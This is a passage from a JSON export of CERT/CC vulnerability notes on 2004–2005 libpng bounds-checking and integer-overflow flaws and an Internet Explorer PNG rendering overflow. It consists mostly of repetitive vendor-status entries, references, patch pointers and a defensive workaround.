vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Sequent Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Sony Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### SuSE Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Sun Microsystems Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### TurboLinux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Unisys Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### Wind River Systems Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\n### eMC Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23160448 Feedback>).\n\nView all 36 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://scary.beasts.org/security/CESA-2004-001.txt>\n * <http://www.libpng.org/pub/png/>\n * <http://libpng.sourceforge.net/>\n\n### Acknowledgements\n\nThanks to Chris Evans for reporting this vulnerability.\n\nThis document was written by Chad Dougherty and Damon Morda.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2004-0599](<http://web.nvd.nist.gov/vuln/detail/CVE-2004-0599>) \n---|--- \n**Severity Metric:** | 0.97 \n**Date Public:** | 2004-08-04 \n**Date First Published:** | 2004-08-04 \n**Date Last Updated: ** | 2004-08-04 15:59 UTC \n**Document Revision: ** | 18 \n", "modified": "2004-08-04T15:59:00", "published": "2004-08-04T00:00:00", "id": "VU:160448", "href": "https://www.kb.cert.org/vuls/id/160448", "type": "cert", "title": "libpng integer overflow in image height processing", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2020-09-18T20:43:44", "bulletinFamily": "info", "cvelist": ["CVE-2004-0597"], "description": "### Overview \n\nThe Portable Network Graphics library ([libpng](<http://www.libpng.org/pub/png/libpng.html>)) contains a flaw that could introduce a remotely exploitable vulnerability.\n\n### Description \n\nThe Portable Network Graphics ([PNG](<http://www.libpng.org/pub/png/spec/1.2/PNG-Contents.html>)[](<http://www.libpng.org/pub/png/>)) image format is used as an alternative to other image formats such as the Graphics Interchange Format (GIF). The libpng reference library is available for application developers to support the PNG image format.\n\nA potentially insufficient bounds check error exists within the `png_handle_sBIT()` function. A similar error exists in the `png_handle_hIST()` function. While the code that contains these errors could potentially permit a buffer overflow to occur during a subsequent `png_crc_read()` operation, it is unclear what practical vulnerabilities they might present in applications using libpng. \n \nMultiple applications support the PNG image format, including web browsers, email clients, and various graphic utilities. Because multiple products have used the libpng reference library to implement native PNG image processing, multiple applications will be affected by this issue in different ways. \n \nPlease note that this vulnerability is known to exist in Microsoft Windows Messenger and MSN Messenger. Please see [MS05-009](<http://www.microsoft.com/technet/security/Bulletin/MS05-009.mspx>) for more details. For information regarding how this vulnerability affects Microsoft Internet Explorer, refer to [MS05-025](<http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>). \n \n--- \n \n### Impact \n\nThe complete impact of this vulnerability is not yet known. \n \n--- \n \n### Solution \n\n**Apply a patch from the vendor**\n\n \nPatches have been released to address this vulnerability. Please see the Systems Affected section of this document for more details. \n \n--- \n \n### Vendor Information\n\n817368\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Gentoo Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Microsoft Corporation __ Affected\n\nNotified: July 16, 2004 Updated: June 14, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [MS05-009](<http://www.microsoft.com/technet/security/Bulletin/MS05-009.mspx>) and [MS05-025](<http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>) for information concerning this vulnerability and its remediation.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### OpenPKG Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Slackware Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Trustix Secure Linux Affected\n\nUpdated: August 20, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### libpng.org __ Affected\n\nNotified: July 16, 2004 Updated: August 04, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis issue has been resolved in libpng version [1.2.6rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258107>) (release candidate 1). An older version of libpng containing the backported fixes, [1.0.16rc1](<http://sourceforge.net/project/showfiles.php?group_id=5624&package_id=5683&release_id=258106>), is also available.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Juniper Networks __ Not Affected\n\nNotified: July 16, 2004 Updated: July 23, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`Juniper Networks products are not susceptible to this vulnerability`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### NEC Corporation __ Not Affected\n\nNotified: July 16, 2004 Updated: August 03, 2004 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\n`sent on August 2, 2004 \n \n[Software Products] \n \n* E-mail client software \"WeMail\" \n(shareware developped by NEC Communication Systems,Ltd.) \n- is NOT vulnerable. \nIt does not include any code originated from libPNG. \n \n* We continue to try to investigate other products possibly affected \nby these vulnerabilities. \n`\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Apple Computer Inc. Unknown\n\nNotified: July 16, 2004 Updated: May 17, 2005 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### BSDI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Conectiva Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Cray Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Debian Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Engarde Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### FreeBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Fujitsu Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Hewlett-Packard Company Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Hitachi Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### IBM Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### IBM eServer Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### IBM-zSeries Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### IMmunix Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Ingrian Networks Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### MandrakeSoft Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### MontaVista Software Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### NETBSD Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Nokia Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Novell Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Openwall GNU/*/Linux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Red Hat Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### SGI Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### ScO Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Sequent Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Sony Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### SuSE Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Sun Microsystems Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### TurboLinux Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### Wind River Systems Inc. Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### eMC Corporation Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\n### uNisys Unknown\n\nUpdated: July 23, 2004 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23817368 Feedback>).\n\nView all 40 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n * <http://scary.beasts.org/security/CESA-2004-001.txt>\n * <http://www.libpng.org/pub/png/>\n * <http://libpng.sourceforge.net/>\n * <http://www.microsoft.com/technet/security/Bulletin/MS05-009.mspx>\n * <http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>\n\n### Acknowledgements\n\nThanks to Chris Evans for reporting this vulnerability.\n\nThis document was written by Chad Dougherty and Damon Morda.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2004-0597](<http://web.nvd.nist.gov/vuln/detail/CVE-2004-0597>) \n---|--- \n**Severity Metric:** | 0.76 \n**Date Public:** | 2004-08-04 \n**Date First Published:** | 2004-08-04 \n**Date Last Updated: ** | 2005-06-14 20:57 UTC \n**Document Revision: ** | 20 \n", "modified": "2005-06-14T20:57:00", "published": "2004-08-04T00:00:00", "id": "VU:817368", "href": "https://www.kb.cert.org/vuls/id/817368", "type": "cert", "title": "libpng png_handle_sBIT() performs insufficient bounds checking", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-18T20:43:27", "bulletinFamily": "info", "cvelist": ["CVE-2004-0597", "CVE-2005-1211"], "description": "### Overview \n\nA buffer overflow in the PNG image rendering component of Microsoft Internet Explorer (IE) may allow a remote attacker to execute code on a vulnerable system. \n\n### Description \n\nThe Portable Network Graphics (PNG) image format is used as an alternative to other image formats such as the Graphics Interchange Format (GIF). Microsoft Internet Explorer supports PNG image format. The PNG image rendering component of Microsoft Internet Explorer (`pngfilt.dll`) does not properly handle PNG image files, potentially allowing a buffer overflow to occur. If a remote attacker can persuade a user to access a specially crafted PNG image with IE, that attacker may be able to trigger the buffer overflow.\n\nFor more information about affected components, please refer to [MS05-025](<http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>). Please note that Microsoft has reported this issue is distinct from those previously reported in [VU#817368](<http://www.kb.cert.org/vuls/id/817368>) and [VU#388984](<http://www.kb.cert.org/vuls/id/388984>) (CAN-2004-0597). \n \n--- \n \n### Impact \n\nIf a user opens a specially-crafted PNG image using a vulnerable version of Internet Explorer, an attacker may be able execute arbitrary code with the privileges of the user or cause Internet Explorer to terminate. \n \n--- \n \n### Solution \n\n**Apply An Update** \nMicrosoft has addressed this issue in Microsoft Security Bulletin [MS05-025](<http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>). \n \n--- \n \nMicrosoft Security Bulletin [](<http://www.microsoft.com/technet/security/bulletin/ms05-028.mspx>)[MS05-025](<http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>) suggests the following workarounds. While these workarounds will not correct the underlying vulnerability, they help block known attack vectors. \n \n**Disable PNG rendering** \n \nUntil the patch can be applied, you may wish to disable the PNG rendering in IE. To disable the PNG rendering , follow these steps: \n\n\n 1. Click **Start**, click **Run**, type \"**regsvr32 /u pngfilt.dll**\" (without the quotation marks), and then click **OK**.\n 2. A dialog box appears to confirm that the unregistration process has succeeded. Click **OK** to close the dialog box.\n 3. Close Internet Explorer, and reopen it for the changes to take effect..\n \nIn addition, the following techniques may reduce the likelihood of exploitation: \n \n**Read and send email in plain text format** \n \nOutlook 2003, Outlook 2002 SP1, and Outlook 6 SP1 can be configured to view email messages in text format. Consider the security of fellow Internet users and send email in plain text format when possible. Note that reading and sending email in plain text will not necessarily prevent exploitation of this vulnerability.** \n \nDo not follow unsolicited links** \n \nIn order to convince users to visit their sites, attackers often use URL encoding, IP address variations, long URLs, intentional misspellings, and other techniques to create misleading links. Do not click on unsolicited links received in email, instant messages, web forums, or internet relay chat (IRC) channels. Type URLs directly into the browser to avoid these misleading links. While these are generally good security practices, following these behaviors will not prevent exploitation of this vulnerability in all cases, particularly if a trusted site has been compromised or allows cross-site scripting. \n--- \n \n### Vendor Information\n\n189754\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Microsoft Corporation __ Affected\n\nUpdated: June 14, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease refer to <http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23189754 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | | \nTemporal | | \nEnvironmental | | \n \n \n\n\n### References \n\n<http://www.microsoft.com/technet/security/bulletin/ms05-025.mspx>\n\n### Acknowledgements\n\nThis vulnerability was reported in Microsoft Security Bulletin MS05-025. Microsoft credits Mark Dowd of ISS X-Force for providing information regarding this vulnerability. \n\nThis document was written by Jeff Gennari.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2005-1211](<http://web.nvd.nist.gov/vuln/detail/CVE-2005-1211>) \n---|--- \n**Severity Metric:** | 22.50 \n**Date Public:** | 2005-06-14 \n**Date First Published:** | 2005-06-14 \n**Date Last Updated: ** | 2005-06-27 12:22 UTC \n**Document Revision: ** | 50 \n", "modified": "2005-06-27T12:22:00", "published": "2005-06-14T00:00:00", "id": "VU:189754", "href": "https://www.kb.cert.org/vuls/id/189754", "type": "cert", "title": "Microsoft Internet Explorer buffer overflow in PNG image rendering component", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:51:43", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0500", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0557", "CVE-2004-0598"], "description": "Several 